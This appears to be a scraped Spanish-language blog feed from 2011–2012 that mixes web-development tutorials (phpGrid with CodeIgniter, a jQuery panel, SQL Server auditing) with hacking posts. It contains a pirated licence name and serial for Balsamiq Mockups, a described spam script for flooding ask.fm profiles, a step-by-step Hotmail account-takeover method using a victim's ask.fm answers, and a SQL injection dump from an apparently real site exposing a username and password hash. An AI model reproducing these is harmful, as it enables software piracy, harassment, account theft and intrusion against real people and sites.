Antes de mostrar el código principal, vamos a crear un helper,-helpers/general_helper.php-, con la función desde_hasta(){}

function desde_hasta($desde, $hasta, $contenido)
{
   if(stristr($contenido, $desde))
   {
      $retorno = explode($desde, $contenido);
      unset($retorno[0]);
      foreach($retorno as $retorn)
      {
         $retorn = explode($hasta, $retorn);
         $retorn = $retorn[0];
         $retornar[] = $retorn;
      }
      return $retornar[0];
   }else{ return FALSE; }
}

Esta función es creada y usada con el fin de sólo recolectar el código javascript usado para generar el objeto phpGrid, ya qué esté agrega un código y presenta conflicto a la hora de mostrarlo, -el código es innecesario, es para crear una capa donde se muestra que la versión actual es libre y para obtenerla full hay que comprarla, así que no afecta en nada :p-

Bien se sabe que la metodología usada en CodeIgniter es la MVC (Modelo-Vista-Controlador), así que en el controlador controllers/welcome vamos a ingresar la interacción entre el modelo para mostrarlo en la vista,

class Welcome extends CI_Controller {
   public function index()
   {
      $sql = "SELECT id,nombre,estado FROM perfil";
      
      $this->load->model("welcome_model", "welcome");
      $this->welcome->set_phpGrid($sql, "id", "perfil");
      $phpGrid = $this->welcome->get_phpGrid();      
      
      $this->load->view('template/header', array('title'=>'Integrar phpGrid con CodeIgniter'));
      $this->load->view('welcome', array('phpGrid'=>$phpGrid));
      $this->load->view('template/footer');
   }
}

Para destacar vieron que al llamar una vista, le pasó un parametro del tipo array? Esto es para tener un contenido "variable" en la vista, es como si fuera una variable conmún y corriente, sólo que no tiene valor en la vista, lo obtiene como parámetro enviado desde el controlador.

Más información aquí...

en el modelo models/welcome_model, esta la capa de consultas,

// INCLUIR LIBRERIA
require_once( '//opt//lampp//htdocs//phpGrid//assets//lib//phpGrid_Lite//conf.php' );

class Welcome_model extends CI_Model
{
   
   var $_phpGrid = NULL;
   var $_tableName = NULL;
   
   function set_phpGrid($sql, $sql_key, $sql_table, $title = "phpGrid1Standar")
   {
      // INSTANCIA DE LA CLASE
      $this->_tableName = $sql_table;
      $this->_phpGrid = new C_DataGrid( $sql, $sql_key, $sql_table );
      // IDIOMA
      $this->_phpGrid->set_locale('es');
      // BUSQUEDA AVANZADA
      $this->_phpGrid->enable_advanced_search(true);
      // PERSONALIZAR phpGrid
      $this->_phpGrid->set_caption( $title );
      // EXPORTAR A EXCEL
      $this->_phpGrid->enable_export( 'EXCEL' );
      // AUTO-AJUSTABLE
      $this->_phpGrid->enable_autowidth(true);
   }
   
   function get_phpGrid()
   {
      // NO MOSTRAR DIRECTAMENTE EL phpGrid
      $this->_phpGrid->display(false);
      // RECUPERAR EL SOURCE
      $phpGrid = $this->_phpGrid->get_display(false);
      // SELECCIONAR EL CÓDIGO JAVASCRIPT
      $this->load->helper("general");
      $phpGrid = desde_hasta('<script type="text/javascript">', "</script>", $phpGrid);
      // CONFIGURAR SOURCE Y CAPAS
      $phpGrid = "<script>".$phpGrid."</script><table id='".$this->_tableName."'></table><div id='".$this->_tableName."_pager1'></div>";
      return $phpGrid;
   }
}

Como lo dije antes, se presentaba un conflicto si no extraía el código javascript y lo mostraba en limpio, así que opte por sacarlo y formar una cadena HTML simulando la que supongo que es la real.

y en la vista views/welcome, lo que se va visualizar,

<section id="div_phpGrid">
   <div class="wrapper">
      <?php echo $phpGrid; ?>
   </div>
</section>

Con esto ya tenemos unido la librería phpGrid en CodeIgniter.

NOTA:Cabe destacar qué los archivos de la librería phpGrid, son puestos inicialmente en el archivo template/header, y así al ser invocado no se crearía una estructura HTML completa y quedá mucho más limpio.

PD: La función desde_hasta(){}, es una modificación de la función de WHK, -estaba obsoleta-, que hizo drvy|BSM

Diagramar esquema de una pagina web

noreply@blogger.com (Alex Jurado) — Tue, 08 May 2012 00:20:00 +0000

THE BALSAMIQ MOCKUPS

Using Mockups feels like drawing, but because it’s digital, you can tweak and rearrange easily. Teams can come up with a design and iterate over it in real-time in the course of a meeting.

Product managers, designers, developers, and even clients can now work together in the same tool to quickly iterate over wireframes, before writing code.

After 30 months in business, 40k+ customers and over $4.5M in sales (updated figures here), we think we have learned enough about ourselves, our product, our customers and our competitive space to be able to put a stake in the ground and tell the world what we’re about. This document is the result of that thinking.

Our sweet spot: the ideation phase.
Excruciatingly simple, filled with hidden powers.
Wireframing + real running code is way better than prototyping.
Low in cost, high in quality, built with love.
We love the problem even more than our solution.
We consider you our peers.
Our vision
Smaller company, better service.
We’re here to stay
We’re good citizens

Mockups really shines during the early stage of designing a new interface.

Mockups is zenware, meaning that it will help you get “in the zone”, and stay there. Our aim is for you to forget our software is there at all.

Mockups offers the same speed and rough feel as sketching with a pencil, but with the advantage of the digital medium: enlarging containers is just a drag operation, rearranging elements doesn’t require starting over, and your wireframes will be clear enough that you’ll be able to make sense of them tomorrow.

Mockups should make work fun.

Mockups also excels as a communication tool, a way for the whole team to come together around the right design.

it enables Product Managers to better present requirements with a tool as easy to use as Powerpoint.
it’s polished enough for UX Designers to use, with all the familiar keyboard shortcuts of the Creative Suite tools.
it’s fast, geeky and very power-user-friendly. Developers love that.
it’s so easy to learn, clients and customers can use it (for free even), to describe their needs more clearly

Mockups intentionally makes your wireframes scream both “This is not final!” and “I just threw this together“, eliciting honest feedback, which results in better wireframes, which results in easier to use features, which results in happier users of your software or website, which is what it’s all about.

We realize being “the in-between tool” is a hard balance to strike, but we think we’re doing a pretty good job at it and we’re committed to it. It’s why we created Mockups in the first place.

balsamiq.com
Descargar MockupsForDesktop.exe


# NAME: tstar21
# S/N : eJzzzU/OLi0odswsqikpLkksMjKssUQCNc41hjV+7q5+ACSaDUQ=

Panel Vertical/Horizontal desplegable con jQuery

noreply@blogger.com (Alex Jurado) — Mon, 20 Feb 2012 21:54:00 +0000

Por cosas raras de la vida, necesitaba construir dos panales: uno horizontal y otro vertical, para la construcción de una aplicación, me costo un poco de trabajo y tiempo, así que lo compartiré con ustedes.

Aprenderemos a crear nuestro propio panel lateral desplegable basado en jQuery. Lo haremos partiendo de cero y explicándolo como siempre paso a paso, de forma que todos podamos comprender cómo funciona. Todo ello inspirándonos en el panel lateral de Google Reader.

ARCHIVOS

ESTRUCTURA HTML

html5

<!DOCTYPE html>
<html id="home" lang="en">
    <head>
        <meta charset=utf-8 />
        <link rel="stylesheet" href="css/style.css" />
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
        <script src="js/toggler.js"></script>
        <title>PoC</title>
    </head>
    <body>
        <section id="wrapper">
            <header>
                #header
            </header>
            
            <section id="slideLeft">
                <div id="content">
                    #slideLeft
                </div>
            </section>
            
            <section id="contenido">
                <h1>#contenido</h1>
                <div id="togglerSlideLeft"></div>
                <div id="render">
                    #contenido
                </div>
            </section>
            
            <section id="slideBottom">
                <div id="togglerSlideBottom"></div>
                <div id="content">
                    #slideBottom
                </div>
            </section>
            
            <footer>
                <span>
                    #footer
                </span>
            </footer>
        </section>
    </body>
</html>

APLICANDO ESTILOS

css/style.css

*{ padding:0; margin:0; }
html,body{ height:100%; overflow:hidden; }
body{ font-family:Helvetica, Arial, sans-serif; font-size:12px !Important; }

header{ height:40px; padding:10px; border-bottom:1px solid #c9d7f1; }

#slideLeft{ width:260px; height:100%; float:left; }
#slideLeft #content{ padding:10px; }

#contenido{ height:100%; margin-left:260px; }
#contenido h1{ height:40px; padding:0 10px; background:#c2cff1; font-size:18px; font-weight:bold; }
#contenido #togglerSlideLeft{ width:16px; border-left:1px solid #c2cff1; background:#EBEFF9 url("../img/togglerLeft.gif") no-repeat left center; float:left; }
#contenido #togglerSlideLeft:hover{ background: #c2cff1 url("../img/togglerLeft.gif") no-repeat -25px center; cursor:pointer; }
#contenido #togglerSlideLeft.off{ background: #EBEFF9 url("../img/togglerRight.gif") no-repeat left center; margin-left:0; }
#contenido #togglerSlideLeft.off:hover{ background: #c2cff1 url("../img/togglerRight.gif") no-repeat -25px center; margin-left:0; }

#slideBottom{ width:100%; }
#slideBottom #togglerSlideBottom{ width:100%; height:16px; border-top:1px solid #8c9dc8; background:#EBEFF9 url("../img/togglerDown.gif") no-repeat top center; }
#slideBottom #togglerSlideBottom:hover{ background: #c2cff1 url("../img/togglerDown.gif") no-repeat center -25px; cursor:pointer; }
#slideBottom #togglerSlideBottom.offBottom{ background: #EBEFF9 url("../img/togglerUp.gif") no-repeat top center; margin-left:0; }
#slideBottom #togglerSlideBottom.offBottom:hover{ background: #c2cff1 url("../img/togglerUp.gif") no-repeat center -25px; margin-left:0; }
#slideBottom #content{ padding:10px; }

footer{ width:100%; height:30px; text-align:right; line-height:30px; border-top:1px solid #8c9dc8; background:#C2CFF1; position:fixed; bottom:0; }
footer span{ padding-right:10px; }

AÑADIENDO INTERACCIÓN CON JQUERY

js/jQuery.js
js/toggler.js

Todo ira dentro de,

$(document).ready(function(){

Tendremos unas variables predefinidas,

// Variables para saber el estado de los slide's
    var estadoSlideLeft = true;
    var estadoSlideBottom = true;
    
    // Variables con los elementos de la pagina.
    var contenido = $("#contenido");
    var slideLeft = $("#slideLeft");
    var slideBottom = $("#slideBottom");
    var togglerSlideLeft = $("#togglerSlideLeft");
    var togglerSlideBottom = $("#togglerSlideBottom");
    var render = $("#render");
    
    // Variables con la medida reservada del slideBottom
    var slideBottomHeight = 150;
    var slideBottomWidth = 0;

    // Variables para las medidas
    var windowHeight;
    var togglerHeight;
    var renderHeight;

Tendremos funciones que se ejecutarán inicialmente,

// Calcular y aplicar medidas actuales al iniciar.
    calcularMedidas();
    aplicarMedidas();
    
    // Calcular y aplicar medidas actuales al cambiar el tamaño.
    $(window).resize(function(){
        calcularMedidas();
        aplicarMedidas();
    });

    // Función para calculas las medidas
    function calcularMedidas(){
        windowHeight = document.documentElement.clientHeight;
        
        togglerHeight = (windowHeight - 51 - 40 - 31 - slideBottomHeight);
        renderHeight = (windowHeight - 51 - 40 - 31 - slideBottomHeight);
        slideBottomHeight = (slideBottomHeight - 21);
    }

    // Función para aplicar las medidas
    function aplicarMedidas(){
        slideBottom.css( "height", slideBottomHeight + 'px' );
        render.css( "height", renderHeight + "px" );
        togglerSlideLeft.css( "height", togglerHeight  +"px" );
    }

y finalmente, las dos funciones que se agregarán a los toggles horizontal y vertical,

// Agregar evento click del toggler la función.
    togglerSlideLeft.click( displaySlideLeft );
    togglerSlideBottom.click( displaySlideBottom );

    // Función para mostrar/ocultar el slideLeft
    function displaySlideLeft(){
        if( estadoSlideLeft ){
            slideLeft.hide();
            contenido.css("margin-left", "0");
            togglerSlideLeft.addClass("off");
            estadoSlideLeft = false;
        }else{
            slideLeft.show();
            contenido.css( "margin-left", slideLeft.width()+'px' );
            togglerSlideLeft.removeClass("off");
            estadoSlideLeft = true;
        }
    }
    
    // Función para mostrar/ocultar el slideBottom
    function displaySlideBottom(){
        if( estadoSlideBottom ){
            slideBottomWidth = contenido.height() + parseInt(slideBottomHeight) - 6;
            slideLeft.css("height", slideBottomWidth + 'px' );
            togglerSlideLeft.css("height", (slideBottomWidth - 40) + 'px' );
            contenido.css("height", slideBottomWidth + 'px' );
            render.css( "height", slideBottomWidth + "px" );
            togglerSlideBottom.addClass("offBottom");
            estadoSlideBottom = false;
        }else{
            slideBottomWidth = contenido.height() - parseInt(slideBottomHeight) + 6;
            slideLeft.css("height", slideBottomWidth + 'px' );
            togglerSlideLeft.css("height", (slideBottomWidth - 40) + 'px' );
            contenido.css("height", slideBottomWidth + 'px' );
            togglerSlideBottom.removeClass("offBottom");
            estadoSlideBottom = true;
        }
    }

El código complento esta en, pastebin.com/cW15uu5i

Referencias:
Creando un panel lateral desplegable en jQuery

¿quién desató la guerra cibernética en estados unidos?

noreply@blogger.com (Alex Jurado) — Sat, 21 Jan 2012 06:34:00 +0000

La red está en guerra. El grupo Anonymous ha saboteado los sitios web del FBI, el Ministerio de Justicia estadounidense y algunas casas discográficas en protesta contra el cierre del portal Megaupload. Pero los analistas creen que esta guerra cibernética fue desatada por las mismas autoridades que intentando controlar la red no dejaron otra salida a la ciudadanía que luchar.

En un vídeo colgado en YouTube, un grupo de activistas de Anonymus asumió la responsabilidad de los sabotajes de los portales del Gobierno federal estadounidense, entre ellos el sitio del FBI, de Justicia y de la Casa Blanca. 5.000 usuarios asociados a este grupo lograron dejar inaccesibles esos portales generando una sobrecarga por numerosas entradas a sus páginas de internet. "Somos el 99%, somos Anonymous", publicó el grupo en la red social de Twitter.

Google y Wikipedia se habían unido a la protesta y se alcanzaron los primeros resultados de la lucha: el Congreso estadounidense decidió hace unas horas posponer los debates de las leyes contra la piratería cibernética.

El miembro de la organización Vamos Unidos USA Juan José Gutiérrez cree que la Casa Blanca está preocupada porque no puede controlar la información en la red. Y por eso Washington incrementa el espionaje no solo a sus ciudadanos, sino al resto de personas en internet.

La guerra cibernética ya ha comenzado. No creo que la inició la ciudadanía, más bien pienso que la iniciaron los gobiernos que están preocupados porque circulan sin controles ideas, se intercambian materiales entre los ciudadanos de países a larga y corta distancia y a final de cuentas de todo el mundo. Particularmente si eso implica acción social que cuestione el autoritarismo, ese está siendo el sentir desde hace años por parte de las autoridades en contra de la ciudadanía", comentó Gutiérrez a RT.

El analista considera que EE. UU. no solamente puede incrementar el espionaje en contra de sus ciudadanos y de sus no ciudadanos en todo el mundo, "de hecho lo han estado incrementando. Básicamente las autoridades decidirían quiénes, bajo sospecha de estar infringiendo las leyes de derecho de autor, las autoridades tendrían el derecho de proceder en contra de estas personas antes de que se pudiera comprobar culpabilidad. Eso demuestra una vez más lo erróneo de estas políticas porque una vez más bajo el argumento de proteger en este caso la propiedad intelectual -la música, películas y otros contenidos de carácter comercial-, lo que realmente se estaría haciendo es restringir y sumarle control a la red. Es decir, la ciudadanía tendría cada vez menos control sobre esta herramienta de información y de intercambio de información", dijo.

Algunos expertos, como por ejemplo Barrett Brown, un colaborador de Anonymous, creen que estos conflictos entre los activistas de la red y las autoridades de EE. UU. en el mundo podrían escalar a niveles desproporcionados.

"El problema es que el comportamiento del Gobierno norteamericano y el del resto de países, en el caso de que les otorguemos poderes para hacer una cosa, casi siempre la interpretan a su manera para que puedan hacer cosas aún mayores. El operativo contra el sitio Megaupload demuestra que incluso antes de que la Ley antipirata entre en vigor, han arrestado a sus dueños y han cerrado la página. Imagínense qué sucederá cuando aprueben la SOPA. Mi grupo ya inició una operación pensada para asegurarnos de que SOPA sea derrotada y los que la apoyan resulten intimidados, para que estemos seguros de que no vuelven a pasar cosas como esta", contó a RT Barrett Brown.

Articulo completo en: http://actualidad.rt.com/actualidad/ee_uu/issue_35110.html

FuckingAskFM! SCRIPT SPAM para ASK.FM

noreply@blogger.com (Alex Jurado) — Fri, 06 Jan 2012 08:05:00 +0000

Caprichos y más caprichos, este es uno de los tantos que tengo ahora, y como no tengo nada que hacer y mi novia esta de viaje, pues que más se puede hacer, y para divertirme un rato FuckingAskFM!...

Después de haber hablado un poco del peligro de usar ese famoso sistema de preguntas llamado ~~Fucking~~Ask.FM y nadie sigue los concejos pues decidí crear un script de SPAM ( y más que todo, un metodo para promocionar mi blog ajjaja), para ver si algún día se acabe esa perderá de tiempo (no se que le ven de bueno responder preguntas).

El script consiste en enviar muchos mensajes al mismo perfil para saturar la cuenta, (y molestar personas jajaja) para que al fin se den cuenta de que eso no sirve, es una mierda.

Viernes 6 de Enero de 2012 - 2:40AM
Hasta el momento, tengo es script que manda las solicitudes, ahora no más falta diseñar algo básico para la presentación.

Viernes 6 de Enero de 2012 - 3:30AM
Ya tengo el diseño, hasta ahora el script funciona de la siguiente manera:

1.Se ingresa el nick del usuario victima.
2.Se ingresa el mensaje SPAM.
3.Se ingresa el número de veces que se realizará la petición.

Ahora, sólo queda montarlo a mi hosting.

Viernes 6 de Enero de 2012 - 4:04AM
Ya esta todo listo, quedaré a la espera de ahora levantarme temprano y codearlo de forma automática. Más información ver la nota mental.

NOTA MENTAL
Se me ha ocurrido, esparcir mi script automáticamente, realizando primero una petición a la pagina principal de Ask.FM sacando los perfiles que se muestran en el footer (más publicidad muhahahaha).

Feliz año nuevo amigos h4x0rs! [2012]

noreply@blogger.com (Alex Jurado) — Sat, 31 Dec 2011 08:36:00 +0000

Él, mi gran mentor, un dia me dijo que mi vida era como un gran libro que se escribe día tras día y que lo cierre cuando se acabe. Él me lo enseño todo, mi vida y espíritu me pertenecen y sin él no sería lo que soy ahora.

Feliz navidad mis queridos amigos...
@Kevin Astroz, @Dario Skywálker, @Mike Brian y a los muchos otros que me ayudaron...

LA NUEVA VARIANTE DEL MALWARE DE FACEBOOK

noreply@blogger.com (Alex Jurado) — Tue, 20 Dec 2011 05:50:00 +0000

Ya es demasiado para caer de nuevo en los malwares de esta red social.

De nuevo el mismo malware se esta esparciendo por toda la red social como si nunca hubiera existido, ya se ha explicado muchas veces que hay que tener cuidado con los enlaces externos.

Lo que me llama la atención es que cambiaron la interface por una más, como se podría llamar eso, ¿Llamativa?, ya que ahora parece como si estuvieras ingresando a youtube.com, -cabe destacar que tiene la nueva interfaz de usuario-, hay que darle puntos por ser tan creativo.

Analizaré de nuevo el código a ver sí lo han mejorado un poco, la primer dirección que tengo es woutubewatch1.blogspot.com, y tenemos lo siguiente,

Ahora el perfil apunta a profile/08956306515188510108, tiene el mismo iframe, pero esta vez a,
Al parecer cambiaron de código por otro wiiii, en el nuevo dominio, tenemos la siguiente función, que es la principal, donde se instala el complemento, llamada instalar(), -que tan obvio-...
También existe una función donde carga una imagen, igual que la que encontró mi amigo @alguien, -tendré que esperarlo a ver si me ayuda con una duda que tengo-,
Todavía queda por analizar unas cuantas cosas, pero esperaré un momento, recordemos como eliminarlo.
Para Google Chrome Para Firefox

MALWARE DE NUEVO EN FACEBOOK

noreply@blogger.com (Alex Jurado) — Mon, 12 Dec 2011 06:11:00 +0000

El día de hoy Lunes 12 de Diciembre de 2011, a las 12:15 A.M, inicia el mini análisis del malware que ronda por Facebook.

Como primer movimiento tenemos la pagina tuqam5.blogspot.com, que por ahora será la principal del sitio del malware.

Cuando ingresamos a la URL, nos aparece la siguiente pantalla, pidiéndonos descargar un supuesto plug-in de Youtube.

Imagen 1: Descarga de plug-in.

Ahora nos pide que lo instalemos, (Hasta sale el logo de Youtube jajajaja),

Imagen 2: Instalación plug-in.

Ahora no se que más sigue, no lo instalaré para auto infectarme. Miro el código fuente del blogger y me encuentro el siguiente enlace a otro website, ahora la pagina principal del malware es vevideo.com.es,
Descargo el supuesto plug-in y miro su código fuente, esto es lo que realmente nos interesa. Me encuentro con la siguiente función, supongo que será la que se cargará, además tiene la misma dirección anterior.
Analizando encuentro una lista de blogs, supongo que serán del autor del malware, de no ser así, porque estaría allí?, (te detecte querido malwariento ajjajaja).
Verifico el perfil y no dice gran cosa, pero me llamo la atención que la localidad donde se encuentra el supuestro creado del malware es Pasto : Nariño : Colombia, (a pesar de todo los pastusos no son tan tontos como dicen que son).

Este es el script que se encarga de realizar el malware, como siempre esta ofuscado, vamos a nuestra querida website jsbeautifier.org y lo desofuscamos.

... y seguimos con otro listado de blogs, algunos de ellos ya deshabilitados, pero todos con el mismo contenido.
Encuentro la función que es usada para repartir el malware en Facebook y no me gusto, se nota instantaneamente que fue codeado por un n00b. Ya no diré más, dejaré hasta acá, no perderé más mi tiempo, pensé que era más avanzado.

ELIMINAR MALWARE!

Al ver el código tan básico se me olvidaba decir como eliminarlo, es una extensión ( *.crx | *.xpi ) así que mirad lo siguiente,

Para Google Chrome
Para Firefox

EL PELIGRO DE USAR [ask.fm]

noreply@blogger.com (Alex Jurado) — Tue, 06 Dec 2011 05:32:00 +0000

Desde hace algunos días veo que varios contactos de mi facebook, responden preguntas mediante el mecanismo llamado ask.fm.

¿CÓMO FUNCIONA ESTO?

Simple, es una pagina donde los usuarios ingresan y crean una cuenta, y personas conocidas o anónimas pueden ingresar y realizarte cualquier pregunta, mientras tú la respondes. (Se supone que debe de ser sincera la respuesta, pero hay personas que preguntan hasta: ¿Cuantas veces vas al baño? y algunos llegan al extremo de preguntar: ¿A que vas al baño? ajjajaja).

¿CÓMO PUEDE LLEGAR A SER ESTO PELIGROSO?

Tambien es simple, hay personas que no les importa contestar sinceramente las preguntas, -así deberían de ser todos, pues este es el fin de la pagina, o sino para que lo creaste?-, el caso es qué al contestar la pregunta estas dando casi un 90% de acierto para que puedan robarte tu cuenta de correo, o ya no te acuerdas que hotmail ofrece la oportunidad de devolver la cuenta de correo mediante una pregunta que previamente cuando creaste tu cuenta debiste de responder?

No se para que mie#"! la gente crea una cuenta en ask.fm, no se que le ven de interesante estar respondiendo preguntas que a los otros ni les interesa, sólo preguntan para mostrarse al mundo, que EXISTEN.

NO ME CREEN? MIREN UN EJEMPLO.

Seleccionamos nuestra victima en facebook, en la información buscamos la cuenta de correo que usa para conectarse en esta red social.

Imagen 1: Correo electronico del perfil de la victima.

Ahora, vamos a Cuenta ► Restablecer la contraseña y seleccionamos la opción de He olvidado mi contraseña.

Imagen 2: Seleccionando opción para averiguar pregunta secreta de la cuenta.

Ahora nos muestra una caja de texto para ingresar la cuenta de correo del perfil victima y la captcha de seguridad,

Imagen 3: Cuenta de correo y captcha.

Los ingresamos y nos mostrará la siguiente información, (puede variar ya que algunas personas seleccionan la opción de sólo restablecer la cuenta de correo sólo al correo alternativo, mmm eso me hace acordar de algo EL BUG DEL CORREO ALTERNATIVO [HOTMAIL])

Imagen 4: Respuesta a la pregunta de seguridad.

Aquí es donde debemos de usar nuestra ingeniería social, para realizar la pregunta en la cuenta de la victima en ask.fm, miremos:

Imagen 5: Pregunta y respuesta en ask.fm

NOTA: Que se note la pregunta tan directa que realice, me dio tan duro pensarla ajajajajajjaa

Ahora volvemos a hotmail, ingresamos la respuesta que nos dieron y VOALA!

Imagen 6: Pantalla para cambiar la contraseña.

Así que antes de responder, recuerda cual es tu pregunta de seguridad en todas las cuentas de correo que tengas enlazadas a tu perfil en facebook.

NI LOS MUERTOS SE SALVAN

noreply@blogger.com (Alex Jurado) — Fri, 02 Dec 2011 07:22:00 +0000

#
# BASE DE DATOS
CURRENT DB: wwwjardines

#TABLAS
COUNT(table_name) OF information_schema.tables WHERE table_schema=0x7777776A617264696E6573 IS 32 TABLES FOUND:
[+] Aspirante
[+] Banner
[+] CategoriaInstalacion
[+] CategoriaProducto
[+] Ciudad
[+] ConsultaExepaz
[+] ConsultaMemorial
[+] Convenio
[+] Departamento
[+] DocumentoNoticia
[+] FormularioContacto
[+] FormularioProducto
[+] GaleriaInstalacion
[+] GaleriaNoticia
[+] GaleriaProducto
[+] Instalacion
[+] Log
[+] MapaLote
[+] Noticia
[+] NoticiaModulo
[+] Obituario
[+] Pais
[+] Parametros
[+] Perfil
[+] PlanExepaz
[+] Producto
[+] Registro
[+] Sesion
[+] Sesion_Cliente
[+] TipoContacto
[+] Usuario
[+] VideoNoticia

#COLUMNAS
COUNT(column_name) OF information_schema.columns WHERE table_schema=0x7777776A617264696E6573 AND table_name=0x5573756172696F IS 17 COLUMNS FOUND:
[+] IDUsuario
[+] IDPais
[+] IDDepartamento
[+] IDCiudad
[+] IDPerfil
[+] Nombre
[+] Telefono
[+] User
[+] Password
[+] EmaiL
[+] Autorizado
[+] Nivel
[+] Lenguaje
[+] FechaTrCr
[+] UsuarioTrCr
[+] UsuarioTrEd
[+] FechaTrEd

#REGISTROS
COUNT(*) OF wwwjardines.Usuario IS 1
Data Found: Password=1d2440cb12e1ce5a
Data Found: User=soluciones
#

AUDITORÍA DE SEGURIDAD EN SQL SERVER 2008

noreply@blogger.com (Alex Jurado) — Thu, 01 Dec 2011 19:38:00 +0000

La primera pregunta que nos surge es: ¿Porque auditamos?

Revisando la literatura de auditoría de seguridad, los autores coinciden en que el tener políticas de seguridad es un factor crítico para mantener los datos seguros. La auditoría también nos ayuda a identificar lo que accedió un intruso en el evento de que un ataque sea exitoso.

En SQL 2005 el enfoque estaba orientado a asegurarse de que el usuario no tuviera privilegio mayores a los que necesitaba y que los cambios fueran realizados por el personal autorizado. La herramienta que se promovía para auditar los cambios a la base de datos era el SQL Profiler ya que podía auditar cambios al esquema, operaciones de insertar, actualizar o eliminar registros; y eventos relacionados con cambios de permisos o la creación de nuevos Logins.

Una de las mejoras que trajo SQL Server 2008 Enterprise es un incremento en la capacidad de auditoría a través del uso del SQL Server Audit. A través de esta funcionalidad se puede rastrear y registrar de forma automática los eventos que ocurren a nivel del servidor o a nivel de la base de datos. Esto es posible a través del uso del objeto Audit. Veamos entonces como crear una auditoría, como crear y habilitar una especificación de auditoría a nivel de Servidor o a nivel de base de datos y como visualizar los registros de auditoría.

CREAR UNA AUDITORÍA

Un objeto de auditoría es una colección de una o más acciones individuales o un grupo de acciones que podrán ser rastreadas. Por ejemplo, se puede configurar un objeto de auditoría para identificar todos los logins fallidos. Los eventos se escriben en la localización que se especifique. Se pueden almacenar en un archivo, la bitácora de eventos de aplicaciones o la bitácora de eventos de seguridad.

El objeto de auditoría se puede crear a través del Management Studio (SSMS) o utilizando T-SQL. Desde SSMS se debe presionar el botón de la derecha del mouse sobre la opción New Audit localizada en la carpeta de auditoría bajo el árbol de Seguridad, como se muestra a continuación:

En la pantalla Create Audit se debe ingresar el nombre del objeto de auditoría, y se debe especificar el destino. Si se indica que el destino será un archivo, hay que especificar la ruta donde será almacenado. Finalmente se debe presionar el botón OK para crear el objeto de auditoría.

Para propósitos de este ejemplo cree un segundo objeto de auditoría e ingrese el nombre "AuditarConsultasTablaEmpleado". Seleccione como destino un archivo e indique la ruta donde desee almacenarlo. Ambos objetos estarán localizados bajo la carpeta Audits, como se muestra a continuación. Este objeto de auditoría se utilizará para rastrear las transacciones SELECT realizadas contra la tabla HumanResources.Employee de la base de datos AdventureWorks2008R2.

Si desea crear un objeto de auditoría a través de T-SQL lo puede hacer utilizando el comando CREATE SERVER AUDIT. La siguiente consulta crea el objeto "AuditarConsultasTablaEmpleado". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE SERVER AUDIT [AuditarConsultasTablaEmpleado]
TO FILE  (FILEPATH = N'C:\TEMP');
#

CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE SERVIDOR

Una vez se ha creado los objetos de auditoría, el siguiente paso es crear las especificaciones apropiadas de auditoría. Las especificaciones de auditoría le indican al objeto de auditoría lo que debe rastrear. En el caso del objeto de auditoría llamado "AuditarLoginsFallidos", debemos crear una especificación que busque los logins que no son exitosos. Para lograrlo debemos seleccionar el botón de la derecha del mouse sobre la carpeta "Server Audit Specifications" ubicada bajo el árbol de Seguridad.

Asigne a la especificación de auditoría el nombre: "EspecificacionAuditoriaServidor-LoginsFallidos". Bajo audit seleccione la opción "AuditarLoginsFallidos". Esto asignará la especificación de auditoría "EspecificacionAuditoriaServidor-LoginsFallidos" al objeto de auditoría "AuditarLoginsFallidos". Seleccione el tipo de acción para auditar: "FAILED_LOGIN_GROUP" y presione OK para crear y asignar el objeto de auditoría.

Presione el botón de la derecha del mouse sobre "EspecificacionAuditoriaServidor-LoginsFallidos" para habilitar la especificación a través de la opción: "Enable Server Audit Specification"

Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre "AuditarLoginsFallidos" para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.

Si desea crear una especificación de auditoría a nivel de servidor, a través de T-SQL, lo puede hacer utilizando el comando CREATE SERVER AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría "EspecificacionAuditoriaServidor-LoginsFallidos". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE SERVER AUDIT SPECIFICATION [EspecificacionAuditoriaServidor-LoginsFallidos]
FOR SERVER AUDIT [AuditarLoginsFallidos]
ADD (FAILED_LOGIN_GROUP) WITH (STATE = ON)
GO
#

CREAR Y HABILITAR UNA ESPECIFICACIÓN DE AUDITORÍA A NIVEL DE BASE DE DATOS

Para crear y habilitar una especificación de auditoría a nivel de base de datos debe expandir la base de datos, en este ejemplo utilice AdventureWorks2008R2, y seleccione con el botón de la derecha del mouse la opción "Audit Specifications" bajo el árbol de seguridad de la base de datos. Seleccione la opción "New Database Audit Specification" y asigne un nombre (para propósito de este ejemplo asignaremos el nombre: "EspecificacionAuditoriaDB-ConsultasTablaEmpleado")

Como se muestra en la siguiente figura, seleccione la opción "AuditarConsultasTablaEmpleado" Bajo audit. Esto asignará la especificación de auditoría "EspecificacionAuditoriaDB-ConsultasTablaEmpleado" al objeto de auditoría "AuditarConsultasTablaEmpleado".

NOTA: La clase de objeto se utiliza para indicar lo que se quiere auditar. Las opciones son: Objeto, Base de datos o Esquema. Seleccione objeto para auditar Tablas, Funciones, Procedimientos Almacenados o Vistas. El nombre del Principal son entidades que pueden solicitar recursos de SQL Server.

Para propósitos de este ejemplo, seleccione "SELECT" en el tipo de acción para auditar; en la clase del objeto seleccione "OBJECT"; en el nombre del objeto ingrese [HumanResources].[Employee]; en el nombre del Principal ingrese [public] y presione OK para crear y asignar el objeto de auditoría.

Esto permite rastrear las consultas con SELECT que realizan todos los usuarios a la tabla [HumanResources].[Employee].

Presione el botón de la derecha del mouse sobre "EspecificacionAuditoriaDB-ConsultasTablaEmpleado" para habilitar la especificación a través de la opción: "Enable Database Audit Specification"

Finalmente debe habilitar el objeto de auditoría presionando el botón de la derecha del mouse sobre "AuditarConsultasTablaEmpleado" para habilitar la auditoria a través de la opción Enable Audit como se muestra en la siguiente figura.

Si desea crear una especificación de auditoría a nivel de base de datos, a través de T-SQL, lo puede hacer utilizando el comando CREATE DATABASE AUDIT SPECITICATION. La siguiente consulta crea la especificación de auditoría "EspecificacionAuditoriaDB-ConsultasTablaEmpleado". Esta operación fue realizada anteriormente a través de SSMS.

#
USE master
CREATE DATABASE AUDIT SPECIFICATION [DatabaseAuditSpec-EmployeesTable]
FOR SERVER AUDIT [Audit-EmployeeQueries]
ADD (SELECT ON OBJECT::[HumanResources].[Employee] BY [public])
WITH (STATE = ON)
GO
#

